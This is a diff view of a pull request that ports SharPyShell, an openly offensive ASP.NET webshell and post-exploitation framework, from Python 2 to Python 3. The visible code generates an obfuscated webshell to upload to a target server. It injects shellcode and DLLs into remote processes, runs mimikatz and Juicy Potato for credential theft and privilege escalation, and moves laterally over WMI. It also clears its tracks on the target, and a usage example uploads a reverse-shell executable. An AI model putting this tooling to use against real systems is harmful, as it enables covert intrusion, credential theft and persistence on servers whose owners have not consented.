STRLCPY/SharPyShell

■ ■ ■ ■ ■ ■

SharPyShell.py

1		-	#!/usr/bin/env python2
	1	+	#!/usr/bin/env python3
2	2
3	3		from core.Generate import Generate
4	4		from core.SharPyShellPrompt import SharPyShellPrompt
		skipped 139 lines
144	144
145	145
146	146		if __name__ == '__main__':
147		-	print config.banner
	147	+	print (config.banner)
148	148		parser = argparse.ArgumentParser(prog='SharPyShell', formatter_class=argparse.RawTextHelpFormatter,
149	149		epilog=example_text_main)
150	150		parser.add_argument('--version', action='version', version=config.header)
		skipped 14 lines

■ ■ ■ ■ ■ ■

core/ChannelAES.py

		skipped 7 lines
8	8		BS = 16
9	9
10	10		def __init__(self, password):
11		-	self.hashed_password = password.decode('hex')
	11	+	self.hashed_password = bytes.fromhex(password)
12	12		self.IV = self.hashed_password[0:self.BS]
13	13
14	14		def encrypt(self, plain_data):
		skipped 7 lines
22	22		aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
23	23		unpad = lambda s: s[:-ord(s[len(s) - 1:])]
24	24		decrypted_data = aes.decrypt(encrypted_data)
25		-	return unpad(decrypted_data)
	25	+	return unpad(decrypted_data).decode()
	26	+

■ ■ ■ ■ ■ ■

core/ChannelXOR.py

1	1		from utils.Singleton import Singleton
2		-
	2	+	from itertools import cycle
3	3
4	4		class ChannelXOR(Singleton):
5	5		password = None
6	6
7	7		def __init__(self, password):
8		-	self.password = password.encode('utf-8')
	8	+	self.password = password
9	9
10	10		def encrypt(self, plain_data):
11	11		key = self.password
12		-	from itertools import izip, cycle
13		-	xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
14		-	return bytearray(xored)
	12	+	xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in list(zip(plain_data, cycle(key))))
	13	+	return bytes(xored, 'utf-8')
15	14
16	15		def decrypt(self, encrypted_data):
17		-	return self.encrypt(encrypted_data)
	16	+	return self.encrypt(encrypted_data.decode('utf-8')).decode()
	17	+

■ ■ ■ ■ ■ ■

core/Environment.py

		skipped 6 lines
7	7
8	8		_exception_class = GetTempDirectoryException
9	9
10		-	_runtime_code = ur"""
	10	+	_runtime_code = r"""
11	11		using System;using System.IO;using System.Diagnostics;using System.Text;
12	12		public class SharPyShell
13	13		{
		skipped 31 lines
45	45
46	46		_exception_class = GetEnvDirectoryException
47	47
48		-	_runtime_code = ur"""
	48	+	_runtime_code = r"""
49	49		using System;using System.IO;using System.Diagnostics;using System.Text;
50	50		using System.Security.AccessControl;using System.Security.Principal;
51	51
		skipped 49 lines
101	101
102	102		_exception_class = ClearDirectoriesException
103	103
104		-	_runtime_code = ur"""
	104	+	_runtime_code = r"""
105	105		using System;using System.IO;using System.Diagnostics;using System.Text;
106	106		public class SharPyShell
107	107		{
		skipped 90 lines
198	198		excluded_path = ['env_directory', 'working_directory']
199	199		modules_path = ['@"' + v + '"' for k, v in env_settings.items() if k not in excluded_path]
200	200		modules_path_string_array = '{' + ','.join(modules_path) + '}'
201		-	print '\nRemoving tracks....\n'
	201	+	print ('\nRemoving tracks....\n')
202	202		result = self.clear_dir_obj.run([modules_path_string_array, env_directory])
203	203		if '{{{ClearDirectoriesException}}}' not in result:
204	204		result = format_output(result)
		skipped 4 lines

■ ■ ■ ■ ■ ■

core/Generate.py

1	1		from core import config
2	2		from struct import unpack
	3	+	from itertools import cycle
3	4		import hashlib
4	5		import random
5		-
	6	+	import io
6	7
7	8		class Generate():
8	9
		skipped 7 lines
16	17		__output_path = config.output_path + 'sharpyshell.aspx'
17	18
18	19		def __init__(self, password, encryption, obfuscator, endian_type, output):
	20	+	password = password.encode('utf-8')
19	21		if encryption == 'aes128':
20	22		self.__password = hashlib.md5(password).hexdigest()
21	23		else:
		skipped 19 lines
41	43
42	44		def __generate_webshell_code_encrypted_dll(self, template_code):
43	45		def xor_file(path, key):
44		-	with open(path, 'rb') as file_handle:
	46	+	with io.open(path, mode='rb') as file_handle:
45	47		plain_data = file_handle.read()
46		-	from itertools import izip, cycle
47		-	xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
48		-	return bytearray(xored)
49		-
50		-	def generate_byte_file_string(byte_arr):
51		-	output = [str(hex(byte)) for byte in byte_arr]
52		-	return '{' + ",".join(output) + '}'
	48	+	xored = []
	49	+	for (x, y) in list(zip(plain_data, cycle(key))):
	50	+	xored.append(hex(x ^ ord(y)))
	51	+	return '{' + ",".join(xored) + '}'
53	52
54	53		if 'aes' in self.__encryption:
55	54		dll_name = 'runtime_compiler_aes.dll'
		skipped 1 lines
57	56		dll_name = 'runtime_compiler_xor.dll'
58	57		runtime_compiler_dll_path = self.__runtime_compiler_path + dll_name
59	58		obfuscated_dll = xor_file(runtime_compiler_dll_path, self.__password)
60		-	obfuscated_dll_string = generate_byte_file_string(obfuscated_dll)
61	59		webshell_code = template_code.replace('{{SharPyShell_Placeholder_pwd}}', self.__password)
62		-	webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll_string)
	60	+	webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll)
63	61		return webshell_code
64	62
65	63		def __generate_webshell_code_ulong_compression(self, template_code):
66	64		def get_dll_code(dll_code_path):
67		-	with open(dll_code_path, 'r') as file_handle:
	65	+	with open(dll_code_path, 'rb') as file_handle:
68	66		dll_code = file_handle.read()
69	67		return dll_code
70	68
		skipped 38 lines
109	107		webshell_output_path = self.__output_path
110	108		with open(webshell_output_path, 'w') as file_handle:
111	109		file_handle.write(webshell_code)
112		-	print 'SharPyShell webshell written correctly to: ' + webshell_output_path
113		-	print '\nUpload it to the target server and let\'s start having some fun :) \n\n'
	110	+	print ('SharPyShell webshell written correctly to: ' + webshell_output_path)
	111	+	print ('\nUpload it to the target server and let\'s start having some fun :) \n\n')
114	112

■ ■ ■ ■ ■ ■

core/Module.py

		skipped 19 lines
20	20		"""
21	21		'''runtime_code must have the class name "SharPyShell" and the main function name "ExecRuntime". The ExecRuntime
22	22		function will be the code run on the server and it must return results in byte[] type '''
23		-	_runtime_code = ur"""
	23	+	_runtime_code = r"""
24	24		using System;using System.IO;using System.Diagnostics;using System.Text;
25	25		public class SharPyShell
26	26		{
		skipped 37 lines
64	64		response_status_code, response_headers, response_text = \
65	65		self._request_object.send_request(request_encrypted_encoded)
66	66		if response_status_code != 200:
67		-	raise self._exception_class('{{{' + self._exception_class.__name__ + '}}}\n' +
	67	+	raise self._exception_class('{{{' + str(self._exception_class.__name__) + '}}}\n' +
68	68		str(response_headers) + '\n\n' +
69		-	response_text)
	69	+	str(response_text))
70	70		return response_text
71	71
72	72		def _decrypt_response(self, encrypted_response_encoded):
		skipped 25 lines

■ ■ ■ ■ ■ ■

core/Request.py

	1	+	from utils.Singleton import Singleton
1	2		from utils.Singleton import Singleton
2	3		import ssl
3	4		import urllib3
		skipped 50 lines

■ ■ ■ ■ ■ ■

core/SharPyShellPrompt.py

1		-	import config
	1	+	from core import config
2	2		from cmd import Cmd
3	3		import os
4	4		import glob
5	5		import sys
	6	+	import importlib
6	7		import shlex
7	8		import hashlib
8	9		import signal
		skipped 19 lines
28	29
29	30		def __init__(self, password, channel_enc_mode, default_shell, url, user_agent,
30	31		cookies, custom_headers, insecure_ssl, proxy):
31		-	reload(sys)
32		-	sys.setdefaultencoding('utf8')
	32	+	importlib.reload(sys)
	33	+	#sys.setdefaultencoding('utf8')
	34	+	password = password.encode('utf-8')
33	35		signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
34	36		Cmd.__init__(self)
35	37		if channel_enc_mode == 'aes128':
		skipped 44 lines
80	82		return self.emptyline()
81	83		if cmd.startswith('#'):
82	84		response = self.onecmd_custom(cmd.lstrip('#'), args)
83		-	print response
	85	+	print (response)
84	86		return response
85	87		if cmd in self.helper_commands:
86	88		func = getattr(self, 'do_' + cmd.lstrip('#'))
		skipped 26 lines
113	115		"""Change the current working directory."""
114	116		working_directory = self.modules_settings['working_directory']
115	117		if arg == "" or arg == " " or arg == '.':
116		-	print working_directory
	118	+	print (working_directory)
117	119		return
118	120		if arg == '..':
119	121		arg = working_directory.split('\\')
		skipped 7 lines
127	129		elif len(arg) > 0:
128	130		arg = '\\'.join(arg)
129	131		else:
130		-	print "Empty Path."
	132	+	print ("Empty Path.")
131	133		return
132	134		else:
133	135		if '/' in arg:
		skipped 9 lines
143	145		if '{{{SharPyShellError}}}' not in response:
144	146		self.modules_settings['working_directory'] = arg
145	147		else:
146		-	print response
	148	+	print (response)
147	149		return response
148	150
149	151		def do_help(self, arg):
150	152		"""List available commands."""
151	153		if arg and arg.lstrip('#') in self.modules_loaded_tree:
152		-	print self.modules_loaded[arg.lstrip('#')].complete_help
	154	+	print (self.modules_loaded[arg.lstrip('#')].complete_help)
153	155		else:
154		-	print "\n\n" + self.doc_header + "\n"
	156	+	print ("\n\n" + self.doc_header + "\n")
155	157		data = [['\nCommands\n', '\nDesc\n']]
156	158		for module_name in sorted(self.modules_loaded_tree):
157	159		data.append(['#%s' % module_name, self.modules_loaded[module_name].short_help])
158		-	print prettify.tablify(data, table_border=False)
	160	+	print (prettify.tablify(data, table_border=False))
159	161		print
160		-	print "\n" + "SharPyShell Helper Commands:" + "\n"
	162	+	print ("\n" + "SharPyShell Helper Commands:" + "\n")
161	163		data = [['\nCommands\n', '\nDesc\n']]
162	164		for module_name in sorted(self.helper_commands):
163	165		data.append(['%s' % module_name, getattr(self, 'do_'+module_name).__doc__])
164		-	print prettify.tablify(data, table_border=False)
	166	+	print (prettify.tablify(data, table_border=False))
165	167		print
166	168
167	169		def complete_help(self, text, line, start_index, end_index):
		skipped 49 lines
217	219		return
218	220		# Clean trailing newline if existent to prettify output
219	221		result = result[:-1] if (
220		-	isinstance(result, basestring) and
	222	+	isinstance(result, str) and
221	223		result.endswith('\n')
222	224		) else result
223		-	print result
	225	+	print (result)
224	226
225	227		def cmdloop(self, intro=None):
226	228		"""Repeatedly issue a prompt, accept input, parse an initial prefix
		skipped 24 lines
251	253		else:
252	254		if self.use_rawinput:
253	255		try:
254		-	line = raw_input(self.prompt)
	256	+	line = input(self.prompt)
255	257		except EOFError:
256	258		line = 'EOF'
257	259		else:
		skipped 21 lines
279	281		def do_quit(self, args=[]):
280	282		"""Quit the program."""
281	283		if self.online:
282		-	print "\n\nQuitting...\n"
283		-	print self.env_obj.clear_env(self.modules_settings)
	284	+	print ("\n\nQuitting...\n")
	285	+	print (self.env_obj.clear_env(self.modules_settings))
284	286		else:
285		-	print args[0] + "\n\n\nTarget Offline...\n"
	287	+	print (args[0] + "\n\n\nTarget Offline...\n")
286	288		raise SystemExit
287	289
288	290		def do_exit(self, args=[]):
		skipped 3 lines

■ ■ ■ ■ ■ ■

modules/download.py

		skipped 35 lines
36	36		#download C:\windows\system32\cmd.exe /home/user/cmd.exe 1024
37	37		"""
38	38
39		-	_runtime_code = ur"""
	39	+	_runtime_code = r"""
40	40		using System;using System.IO;using System.Diagnostics;using System.Text;
41	41		public class SharPyShell{
42	42		public byte[] Download(string arg){
		skipped 13 lines
56	56		}
57	57		"""
58	58
59		-	__runtime_code_split_file = ur"""
	59	+	__runtime_code_split_file = r"""
60	60		using System;using System.IO;using System.Diagnostics;using System.Text;
61	61		public class SharPyShell{
62	62		public byte[] Download(string arg, int chunk, int offset){
		skipped 16 lines
79	79		}
80	80		"""
81	81
82		-	__runtime_code_get_file_size = ur"""
	82	+	__runtime_code_get_file_size = r"""
83	83		using System;using System.IO;using System.Diagnostics;using System.Text;
84	84		public class SharPyShell{
85	85		string GetFileSize(string path){
		skipped 30 lines
116	116		else:
117	117		file_open_mode = 'wb'
118	118		with open(output_path, file_open_mode) as outfile:
119		-	outfile.write(file_content)
	119	+	outfile.write(bytes(file_content, "utf-8"))
120	120		output = "File Downloaded correctly to " + output_path
121	121		return output
122	122
		skipped 43 lines
166	166		file_content = self._parse_response(decrypted_response)
167	167		if len(requests) > 1:
168	168		parsed_response = self.__write_local_file(file_content, download_output_path, split=True)
169		-	print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
170		-	str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path
	169	+	print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
	170	+	str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path)
171	171		else:
172	172		parsed_response = self.__write_local_file(file_content, download_output_path)
173	173		except ModuleException as module_exc:
		skipped 6 lines

■ ■ ■ ■ ■ ■

modules/exec_cmd.py

		skipped 29 lines
30	30		#exec_cmd echo test > C:\Windows\Temp\test.txt
31	31		"""
32	32
33		-	_runtime_code = ur"""
	33	+	_runtime_code = r"""
34	34		using System;using System.IO;using System.Diagnostics;using System.Text;
35	35		public class SharPyShell
36	36		{
		skipped 46 lines

■ ■ ■ ■ ■ ■

modules/exec_ps.py

		skipped 31 lines
32	32
33	33		"""
34	34
35		-	_runtime_code = ur"""
	35	+	_runtime_code = r"""
36	36		using System;using System.IO;using System.Diagnostics;using System.Text;
37	37		public class SharPyShell
38	38		{
		skipped 41 lines
80	80		if '""' in cmd:
81	81		cmd = cmd.replace('""', '"')
82	82		cmd = '$ProgressPreference = "SilentlyContinue";' + cmd
83		-	cmd = b64encode(cmd.encode('UTF-16LE'))
	83	+	cmd = str(b64encode(cmd.encode('UTF-16LE')), 'UTF-8')
84	84		working_path = self._module_settings['working_directory']
85	85		return self._runtime_code % (cmd, working_path)
86	86
		skipped 2 lines

■ ■ ■ ■ ■ ■

modules/inject_dll_reflective.py

		skipped 51 lines
52	52		def __get_reflective_loader_offset(self, dll_path):
53	53		pe_parser = pefile.PE(dll_path)
54	54		for exported_function in pe_parser.DIRECTORY_ENTRY_EXPORT.symbols:
55		-	if 'ReflectiveLoader' in exported_function.name:
	55	+	if 'ReflectiveLoader' in str(exported_function.name):
56	56		reflective_loader_rva = exported_function.address
57	57		return hex(pe_parser.get_offset_from_rva(reflective_loader_rva))
58	58		raise self._exception_class('The DLL does not contain a reflective loader function.\n')
		skipped 4 lines
63	63		dll_path = config.modules_paths + 'reflective_dll/' + dll_path
64	64		code_offset = str(self.__get_reflective_loader_offset(dll_path))
65	65		with open(dll_path, 'rb') as file_handle:
66		-	byte_arr = bytearray(file_handle.read())
	66	+	byte_arr = file_handle.read()
67	67		base64_compressed_dll = gzip_utils.get_compressed_base64_from_binary(byte_arr)
68	68		if injection_type == 'remote_virtual_protect':
69	69		runtime_code = self._runtime_code % (self._runtime_code_virtual_protect, base64_compressed_dll,
		skipped 8 lines

■ ■ ■ ■ ■ ■

modules/inject_dll_srdi.py

		skipped 37 lines
38	38		functionHash = 0
39	39
40	40		for b in function:
41		-	b = ord(b)
42	41		functionHash = ror(functionHash, 13, 32)
43	42		functionHash += b
44	43
45	44		moduleHash = 0
46	45
47	46		for b in module:
48		-	b = ord(b)
49	47		moduleHash = ror(moduleHash, 13, 32)
50	48		moduleHash += b
51	49
		skipped 5 lines
57	55		functionHash = 0
58	56
59	57		for b in function:
60		-	b = ord(b)
61	58		functionHash = ror(functionHash, 13, 32)
62	59		functionHash += b
63	60
		skipped 81 lines
145	142		# RDI shellcode
146	143		# DLL bytes
147	144		# User data
148		-	return bootstrap + rdiShellcode + dllBytes + userData
	145	+	return bootstrap + rdiShellcode + dllBytes + str.encode(userData, 'utf-16-le')
149	146
150	147		else: # 32 bit
151	148		rdiShellcode = rdiShellcode32
		skipped 65 lines
217	214		# RDI shellcode
218	215		# DLL bytes
219	216		# User data
220		-	return bootstrap + rdiShellcode + dllBytes + userData
	217	+	return bootstrap + rdiShellcode + dllBytes + str.encode(userData, 'utf-16-le')
221	218
222	219
223	220		class Inject_dll_srdi(Inject_shellcode):
		skipped 57 lines
281	278		thread_parameters, exported_function_name, exported_function_data = self._parse_run_args(args)
282	279		dll_path = config.modules_paths + 'dll/' + dll_path
283	280		with open(dll_path, 'rb') as file_handle:
284		-	dll_bin_byte_arr = bytearray(file_handle.read())
	281	+	dll_bin_byte_arr = file_handle.read()
285	282		srdi_object = sRDI()
286	283		if exported_function_name != 0x10:
287	284		exported_function_name = srdi_object.HashFunctionName(exported_function_name)
		skipped 15 lines

■ ■ ■ ■ ■ ■

modules/inject_shellcode.py

		skipped 44 lines
45	45
46	46		"""
47	47
48		-	_runtime_code = ur"""
	48	+	_runtime_code = r"""
49	49		using System;using System.IO;using System.Diagnostics;using System.Text;
50	50		using System.Runtime.InteropServices; using System.IO.Compression;
51	51
		skipped 178 lines
230	230		}
231	231		"""
232	232
233		-	_runtime_code_virtual = ur"""
	233	+	_runtime_code_virtual = r"""
234	234		IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT \| MEM_RESERVE, PAGE_EXECUTE_READWRITE);
235	235		if(codeMemAddress == (IntPtr)0){
236	236		output += error_string + "\n\tError allocating code buffer memory.\n\tVirtualAllocEx failed with error code " + Marshal.GetLastWin32Error();
		skipped 8 lines
245	245		output += "\n\n\tCode written into remote process. Bytes written: " + bytesWrittenCode.ToString();
246	246		"""
247	247
248		-	_runtime_code_virtual_protect = ur"""
	248	+	_runtime_code_virtual_protect = r"""
249	249		uint codeMemSize = codeMemorySize;
250	250		IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT \| MEM_RESERVE, PAGE_READWRITE);
251	251		if(codeMemAddress == (IntPtr)0){
		skipped 50 lines

■ ■ ■ ■ ■ ■

modules/invoke_ps_module.py

		skipped 36 lines
37	37		#invoke_ps_module PowerUp.ps1 ';Invoke-AllChecks'
38	38		"""
39	39
40		-	_ps_code = ur"""
	40	+	_ps_code = r"""
41	41		$path_in_module="%s";
42	42		$path_in_app_code="%s";
43	43		$key=[System.Text.Encoding]::UTF8.GetBytes('%s');
		skipped 13 lines
57	57		Remove-Item -Path $path_in_app_code -Force 2>&1 \| Out-Null;
58	58		"""
59	59
60		-	_ps_code_no_appended_code = ur"""
	60	+	_ps_code_no_appended_code = r"""
61	61		$path_in="%s";
62	62		$key=[System.Text.Encoding]::UTF8.GetBytes('%s');
63	63		$encrypted=[System.IO.File]::ReadAllBytes($path_in);
		skipped 44 lines
108	108		if '""' in appended_code:
109	109		appended_code = appended_code.replace('""', '"')
110	110		enc_appended_code_path = config.modules_paths + 'ps_modules/' + random_generator()
111		-	byte_arr_app_module_encrypted = bytearray(appended_code)
	111	+	byte_arr_app_module_encrypted = bytearray(appended_code, 'utf-8')
112	112		self.__xor_bytearray(byte_arr_app_module_encrypted)
113	113		with open(enc_appended_code_path, 'wb') as file_handle:
114	114		file_handle.write(byte_arr_app_module_encrypted)
		skipped 12 lines
127	127		encrypted_module_path = self._module_settings[ps_module]
128	128		else:
129	129		local_encrypted_module_path = self._gen_encrypted_module(ps_module)
130		-	print '\n\n\nUploading encrypted ps module....\n'
	130	+	print ('\n\n\nUploading encrypted ps module....\n')
131	131		try:
132	132		encrypted_module_path = self._module_settings['env_directory'] + '\\' + random_generator()
133	133		upload_response = self._parse_response(self.upload_module_object.run([local_encrypted_module_path,
134	134		encrypted_module_path]))
135		-	print upload_response
	135	+	print (upload_response)
136	136		self._module_settings[ps_module] = encrypted_module_path
137	137		except Exception as exc:
138	138		raise self._exception_class(str(exc))
		skipped 29 lines

■ ■ ■ ■ ■ ■

modules/lateral_wmi.py

		skipped 60 lines
61	61
62	62		"""
63	63
64		-	_runtime_code = ur"""
	64	+	_runtime_code = r"""
65	65		using System;using System.IO;using System.Diagnostics;using System.Text;
66	66		public class SharPyShell
67	67		{
		skipped 36 lines
104	104		}
105	105		"""
106	106
107		-	_runtime_code_runas = ur"""
	107	+	_runtime_code_runas = r"""
108	108		using System;using System.IO;using System.Diagnostics;using System.Text;
109	109		using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
110	110
		skipped 172 lines
283	283		__default_local_user = ''
284	284		__default_local_password = ''
285	285		__default_local_domain = ''
286		-	__wmi_code_arguments = ur'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
	286	+	__wmi_code_arguments = r'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
287	287
288	288		def __run_as_current_user(self, wmi_code_arguments):
289	289		request = self._create_request([wmi_code_arguments, 'current_user'])
		skipped 56 lines

■ ■ ■ ■ ■ ■

modules/mimikatz.py

		skipped 105 lines
106	106		else:
107	107		exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
108	108		remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
109		-	print '\n\n\nUploading mimikatz binary....\n'
	109	+	print ('\n\n\nUploading mimikatz binary....\n')
110	110		upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
111		-	print upload_response
	111	+	print (upload_response)
112	112		self._module_settings['mimikatz.exe'] = remote_upload_path
113	113		bin_path = remote_upload_path
114	114		return bin_path
		skipped 11 lines
126	126		dll_name = 'powerkatz.dll'
127	127		exported_function_name = 'powershell_reflective_mimikatz'
128	128		log_file = self._module_settings['env_directory'] + '\\' + random_generator()
129		-	exported_function_data = str(('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le'))
	129	+	exported_function_data = '"log ' + log_file + '" ' + custom_command
130	130		if username == '':
131		-	print '\n\nInjecting converted DLL shellcode into remote process...'
	131	+	print ('\n\nInjecting converted DLL shellcode into remote process...')
132	132		response = self.inject_dll_srdi_module_object.run([dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
133	133		exported_function_name, exported_function_data])
134	134		response = self._parse_response(response)
		skipped 32 lines

■ ■ ■ ■ ■ ■

modules/privesc_juicy_potato.py

		skipped 55 lines
56	56		#privesc_juicy_potato 'whoami > C:\windows\temp\whoami_juicy.txt' 'exe'
57	57		"""
58	58
59		-	_runtime_code = ur"""
	59	+	_runtime_code = r"""
60	60		using System;using System.IO;using System.Diagnostics;using System.Text;
61	61		public class SharPyShell
62	62		{
		skipped 67 lines
130	130		else:
131	131		exe_path = config.modules_paths + 'exe_modules/JuicyPotato.exe'
132	132		remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
133		-	print '\n\n\nUploading Juicy Potato binary....\n'
	133	+	print ('\n\n\nUploading Juicy Potato binary....\n')
134	134		upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
135		-	print upload_response
	135	+	print (upload_response)
136	136		self._module_settings['JuicyPotato.exe'] = remote_upload_path
137	137		bin_path = remote_upload_path
138	138		return bin_path
		skipped 32 lines
171	171		configuration += ListeningAddress + '\00'
172	172		configuration += str(len(shellcode_bytes)) + '\00'
173	173		configuration += shellcode_bytes
174		-	configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in bytearray(configuration)) + '}'
	174	+	configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in configuration.encode()) + '}'
175	175		response = self.inject_dll_reflective_module_object.run(['juicypotato_reflective.dll', 'remote_virtual',
176	176		'cmd.exe', thread_timeout, configuration_bytes_csharp])
177	177		parsed_response = self._parse_response(response)
		skipped 11 lines
189	189		response = self.__run_exe_version(cmd, arguments)
190	190		else:
191	191		logfile = self._module_settings['env_directory'] + '\\' + random_generator()
192		-	print '\n\nInjecting Reflective DLL into remote process...'
	192	+	print ('\n\nInjecting Reflective DLL into remote process...')
193	193		response = self.__run_reflective_dll_version(cmd, custom_shellcode_path, logfile, clsid)
194	194		response += '\nReflective DLL injection executed!\n\n'
195	195		if custom_shellcode_path == 'default':
		skipped 9 lines

■ ■ ■ ■ ■ ■

modules/runas.py

		skipped 33 lines
34	34		domain domain of the user, if in a domain.
35	35		Default: ''
36	36		process_timeout_ms the waiting time (in ms) to use in the WaitForSingleObject() function.
37		-	This will halt the process until the spawned process ends and sent
38		-	the output back to the webshell.
	37	+	This will halt the process until the spawned process ends and sent the output back to the webshell.
39	38		If you set 0 an async process will be created and no output will be retrieved.
40	39		Default: '60000'
41	40		logon_type the logon type for the spawned process.
		skipped 13 lines
55	54
56	55		"""
57	56
58		-	_runtime_code = ur"""
	57	+	_runtime_code = r"""
59	58		using System;using System.IO;using System.Diagnostics;using System.Text;
60	59		using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
61	60
		skipped 289 lines

■ ■ ■ ■ ■ ■

modules/runas_ps.py

		skipped 52 lines
53	53		def __gen_powershell_launcher(self, ps_code):
54	54		powershell_launcher='powershell -nop -noni -enc '
55	55		ps_code = '$ProgressPreference = "SilentlyContinue";' + ps_code
56		-	powershell_launcher += b64encode(ps_code.encode('UTF-16LE'))
	56	+	powershell_launcher += str(b64encode(ps_code.encode('UTF-16LE')),'UTF-8')
57	57		return powershell_launcher
58	58
59	59		def _create_request(self, args):
		skipped 6 lines
66	66		stderr_file = self._module_settings['env_directory'] + '\\' + random_generator()
67	67		return self._runtime_code % (username, password, domain, cmd, stdout_file, stderr_file,
68	68		working_path, logon_type, process_ms_timeout)
	69	+

■ ■ ■ ■ ■ ■

modules/upload.py

		skipped 34 lines
35	35		#upload /tmp/revshell.exe C:\Users\Public\revshell.exe 1024
36	36		"""
37	37
38		-	_runtime_code = ur"""
	38	+	_runtime_code = r"""
39	39		using System;using System.IO;using System.Diagnostics;using System.Text;
40	40		public class SharPyShell{
41	41		byte[] Upload(string path, byte[] file_bytes){
		skipped 14 lines
56	56		}
57	57		"""
58	58
59		-	__runtime_code_split_file = ur"""
	59	+	__runtime_code_split_file = r"""
60	60		using System;using System.IO;using System.Diagnostics;using System.Text;
61	61		public class SharPyShell{
62	62		byte[] Upload(string path, byte[] file_bytes){
		skipped 17 lines
80	80		}
81	81		"""
82	82
83		-	__runtime_code_init_file = ur"""
	83	+	__runtime_code_init_file = r"""
84	84		using System;using System.IO;using System.Diagnostics;using System.Text;
85	85		public class SharPyShell{
86	86		string InitFile(string path){
		skipped 77 lines
164	164		decrypted_response = self._decrypt_response(encrypted_response)
165	165		parsed_response = self._parse_response(decrypted_response)
166	166		if len(requests) > 1:
167		-	print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_sizei) + ' - ' + str(chunk_sizei+chunk_size) +\
168		-	' bytes written correctly to ' + upload_output_path
	167	+	print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_sizei) + ' - ' + str(chunk_sizei+chunk_size) +\
	168	+	' bytes written correctly to ' + upload_output_path)
169	169		except ModuleException as module_exc:
170	170		parsed_response = str(module_exc)
171	171		except Exception:
		skipped 4 lines

■ ■ ■ ■ ■ ■

utils/Singleton.py

		skipped 2 lines
3	3
4	4		def __new__(cls, args, *kwargs):
5	5		if cls not in cls._instances:
6		-	cls._instances[cls] = super(Singleton, cls).__new__(cls, args, *kwargs)
	6	+	cls._instances[cls] = super(Singleton, cls).__new__(cls)
7	7		return cls._instances[cls]
	8	+

■ ■ ■ ■ ■ ■

utils/gzip_utils.py

1		-	import StringIO
	1	+	import io
2	2		import gzip
3	3		import base64
4	4
5	5
6	6		def get_compressed_base64_from_file(path):
7		-	compressed_stream = StringIO.StringIO()
8		-	with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed, open(path, 'rb') as infile:
9		-	compressed.write(infile.read())
10		-	return base64.b64encode(compressed_stream.getvalue())
	7	+
	8	+	with open(path, 'rb') as f:
	9	+	read_data = f.read()
	10	+	return base64.b64encode(gzip.compress(read_data)).decode()
11	11
12	12
13	13		def get_compressed_base64_from_binary(bin_bytearray_input):
14		-	compressed_stream = StringIO.StringIO()
15		-	with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed:
16		-	compressed.write(str(bin_bytearray_input))
17		-	return base64.b64encode(compressed_stream.getvalue())
	14	+	return base64.b64encode(gzip.compress(bin_bytearray_input)).decode()
18	15

■ ■ ■ ■ ■ ■

utils/prettify.py

		skipped 15 lines
16	16		table = prettytable.PrettyTable()
17	17
18	18		# List outputs.
19		-	if isinstance(data, (types.ListType, types.TupleType)):
	19	+	if isinstance(data, (list, tuple)):
20	20
21	21		if len(data) > 0:
22	22
23	23		columns_num = 1
24		-	if isinstance(data[0], (types.ListType, types.TupleType)):
	24	+	if isinstance(data[0], (list, tuple)):
25	25		columns_num = len(data[0])
26	26
27	27		for row in data:
28	28		if not row:
29	29		continue
30	30
31		-	if isinstance(row, (types.ListType, types.TupleType)):
	31	+	if isinstance(row, (list, tuple)):
32	32		table.add_row(row)
33	33		else:
34	34		table.add_row([row])
		skipped 3 lines
38	38
39	39		# Populate the rows
40	40		randomitem = next(data.itervalues())
41		-	if isinstance(randomitem, (types.ListType, types.TupleType)):
	41	+	if isinstance(randomitem, (list, tuple)):
42	42		for field in data:
43	43		table.add_row([field] + data[field])
44	44		else:
		skipped 40 lines

Merge pull request #14 from NuHarborMartin/py3